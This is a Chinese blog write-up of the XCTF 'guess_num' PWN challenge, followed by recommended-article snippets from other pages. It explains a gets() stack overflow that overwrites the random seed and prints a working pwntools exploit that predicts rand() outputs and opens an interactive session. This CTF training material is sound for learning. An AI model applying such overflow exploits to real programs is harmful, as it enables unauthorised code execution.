guess-num的wp

最新推荐文章于 2022-12-19 15:57:02 发布
最新推荐文章于 2022-12-19 15:57:02 发布
阅读量191 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WangLal/article/details/114447725
版权

攻防世界PWN

guess nun的wp

基本三步

checksec,file,执行文件
在这里插入图片描述
发现是个64位文件,且只有RELRO没开( 出现Permission denied报错时,用chmod去修改文件权限,就可以了)
放进IDA中,在各函数中寻找
在函数sub_C3E中找到了
在这里插入图片描述
再进入main函数中怎样获得flag,上网找了一下srand和rand的含义
srand函数是随机数发生器的初始化函数。
srand和rand()配合使用产生伪随机数序列。
所以要通过给srand设置为0或1,
来保证生成的随机数是相同随机数序列。
有兴趣的可以看一下这位大佬的博客
https://blog.csdn.net/linxi8693/article/details/90712828
在这里插入图片描述
简单看了一下函数,可以发现,只要猜中9次数字就可以运行函数,
(如果有人运气好到能连续猜中9次数字,不用做题目,运行一下程序可以直接获得flag),当然我是个非酋,就只能仔细思考一下了。
我发现可以利用gets存在栈溢出,然后查看一下V8的地址
在这里插入图片描述
即利用v8去覆盖seed[0],使seed[0]已知,然后不管怎么循环,都可以猜中数字,就拿到flag了(var_30才是V8的地址,而不是var_8)
0x30-0x10=32=0x20
之后就可以通过写一个for循环来使猜的数字能对得上程序中的数字
因为要使用srand和rand函数所以要用是 Linux 下的 ANSI C 函数库libc。

EXP

from pwn import *
#用python标准库中自带的ctypes模块进行python和c的混合编程
from ctypes import *
r= process(’./num’)
#与checksec一样的作用
elf = ELF(’./num’)
因为题目没有提供libc库,因此需要使用ldd查找
在这里插入图片描述

libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = b’a’ * 0x20 + p64(1)
r.recvuntil(‘Your name:’)
r.sendline(payload)
libc.srand(1)
for i in range(10):
num = str(libc.rand()%6+1)
r.recvuntil(‘number:’)
r.sendline(num)
r.interactive()
得到flag
在这里插入图片描述

Wanglpl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
guess_numwp
wuyvle的博客
01-23 133
guess_num 这题很有趣(难 ) 放Linux康康 好家伙保护直接加满了,这是个64位程序,放进ida64康康 这题关键在于gets和srand函数的作用 分析函数,srand是根据seed[0]随机生成数 这题要猜10次数字全对才能得到flag 接下来康康gets这个危险函数 思路是从v7下来把seed覆盖成为我们想要的值 在此之前,我们要写一个srand函数 from pwn import * from ctypes import * #引入c语言函数库 context(os = "linu
网鼎杯 pwn guess wp记录 stack smashing
weixin_44740530的博客
05-05 694
网鼎杯 pwn guess wp记录 stack smashing
引用动态库
weixin_30480651的博客
08-02 105
1、引用so库: from ctypes import * >>>CDLL("libc.so.6").printf("12345\n")12345 >>>cdll.LoadLibrary("libc.so.6").printf("12345\n") 12345 2、引用DLL库: 2.1、python2.7.13下的验证 >>>c...
XCTF pwn例题思路整理 侵删
londonyan的博客
11-15 3896
XCTF pwn例题思路整理 侵删 1 .decode("iso-8859-1")处理报错 2 read() 栈溢出 函数定义:ssize_t read(int fd, void * buf, size_t count); 函数说明:read()会把参数fd所指的文件传送count 个字节到buf 指针所指的内存中。 返回值:返回值为实际读取到的字节数, 如果返回0, 表示已到达文...
SWPUCTF 2022 Darling wp
m0_64111146的博客
12-19 146
SWPUCTF 2022 Darling wp
攻防世界-wp-PWN-新手区-3-guess_num
Scorpio_m7
02-05 1508
题目描述: 菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 题目场景: 220.249.52.133:35323 题目附件: b59204f56a0545e8a22f8518e749f19f 题目思路: 随机函数生成的随机数并不是真的随机数,他们只是在一定范围内随机,实际上是一段数字的循环,这些数字取决于随机种子。 解题过程: 载入IDA64,找到main函数,F5反编译得到伪C代码,发现输入v8名字时可以覆盖sreed[0],这样这个随机数列就可控了。 __int64 __fastcall
【BUU】n1ctf2018_null
weixin_43960998的博客
04-12 497
struct malloc_state { /* Serialize access. */ __libc_lock_define (, mutex); /* Flags (formerly in max_fast). */ int flags; /* Set if the fastbin chunks contain recently inserted free blocks. */ /* Note this is a bool but not all targets su
实验吧隐写术WP(三)
热门推荐
Yale的博客
04-02 1万+
1.心中无码(http://www.shiyanbar.com/ctf/1947) 直接stegsolve看发现没怎么样,但是在blue的0处看起来有问题 跑python#coding:utf-8 from PIL import Imagelena = Image.open('Lena.png') b0 = '' #将像素点弄为0,1代码 bnum = 0 width,height =
最新直播系统带商城源码 附搭建教程(价值2w多)
08-05
最新直播系统带商城源码 附搭建教程 功能介绍: 礼物系统:普通礼物、豪华礼物、热门礼物、守护礼物、幸运礼物 提现方式:统一平台提现日期及方式,方便用户执行充值提现操作 连麦送礼PK:主播之间可进行互动连麦送礼PK,PK结束有相应的奖惩 直播间红包:平台主播及用户都可发红包,有多种红包类型及红包提醒 主播守护:可进行平台充值,守护心仪的主播,主播守护时长有多种设置 小视频拍摄:单独的小视频模块,包含视频列表,视频拍摄、编辑、上传、互动等 引导图功能:优化更新系统引导图,后台可上传图片或视频内容,视频内容可跳过 动态:点击动态可进入动态详情页,包含话题的动态点击话题可进入该话题动态列表,可查看该话题下所有动态信息,用户可对动态进行点赞、评论、举报等操作 商城:可通过商品名称搜索商品,搜索后可根据销量价格等进行筛选 商品详情:查看商品的名称价格销量评价等信息,可进入店铺,可与客服沟通,可直接购买 直播观看送礼提示:用户赠送礼物后,直播间公屏聊天处有送礼提示 直播购物车:观众在直播间中可查看主播直播购物车中的商品,点击某个商品跳转到商品介绍页面,商品介绍上有购买按钮,
简单的赛车小游戏,附源码
08-05
初始化和配置:设置游戏窗口大小、pygame 混音器等。 音频管理:AudioManage 类用于加载和播放背景音乐和音效。 精灵类:BaseSprite 是所有游戏对象的基类,EnemySprite、PlayerSprite 和 BgSprite 是继承自 BaseSprite 的具体精灵类。 精灵管理类:EnemyManage、PlayerManage 和 BgManage 分别管理敌人、玩家和背景精灵。 用户界面管理:UIManage 类管理游戏开始界面、游戏进行中的界面和游戏结束界面。 游戏管理:GameManage 类是游戏的主要控制类,负责游戏状态的维护、事件处理、更新绘制以及碰撞检测。 游戏循环:gm.run() 是游戏的主循环,它持续运行直到游戏退出。
ppo学习之ppo算法实现.zip
08-05
ppo算法 ppo学习之ppo算法实现.zip
tampermonkey安装
08-05
tampermonkeytampermonkey安装。内容来源于网络分享,如有侵权请联系我删除。另外如果没有积分的同学需要下载,请私信我。
[java毕业作品]VB+ACCESS电脑销售管理系统设计与实现(源代码+论文)
08-05
[java毕业作品]VB+ACCESS电脑销售管理系统设计与实现(源代码+论文)
SVDD进行异常检测的MATLAB代码.zip
最新发布
08-05
SVDD进行异常检测的MATLAB代码.zip
源代码-yy迷你留言板.zip
08-05
源代码-yy迷你留言板.zip
各省份城市专精特新企业基本信息表2013-202403员工人数主营业务注册资本主要产品等
08-05
各省份城市专精特新企业基本信息表2013-202403员工人数主营业务注册资本主要产品等 41w多记录,100多MB数据的网盘链接) 主要指标: 统计截止日期 机构ID 公司名称 经营状态 财务审计机构 财务审计机构统计时间 成立日期 注册资本 注册资本币种 员工人数 员工人数统计类型 员工人数统计时间 主营业务 其他业务 主营业务所属门类 主要产品 公司登记注册类型 所属省份 所属城市 注册地址 办公地址 工商注册号 网址 电话 邮箱 经营范围 统一社会信用代码 ISIN编码
centos加固.pdf
08-05
centos加固.pdf
GC032A datasheet(侵删)
08-05
GC032A datasheet(侵删)
guess-xsctf
07-28
根据提供的引用内容,我无法确定问题"guess-xsctf"的具体含义。请提供更多的信息或者明确你的问题,我将尽力回答。 #### 引用[.reference_title] - *1* [xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值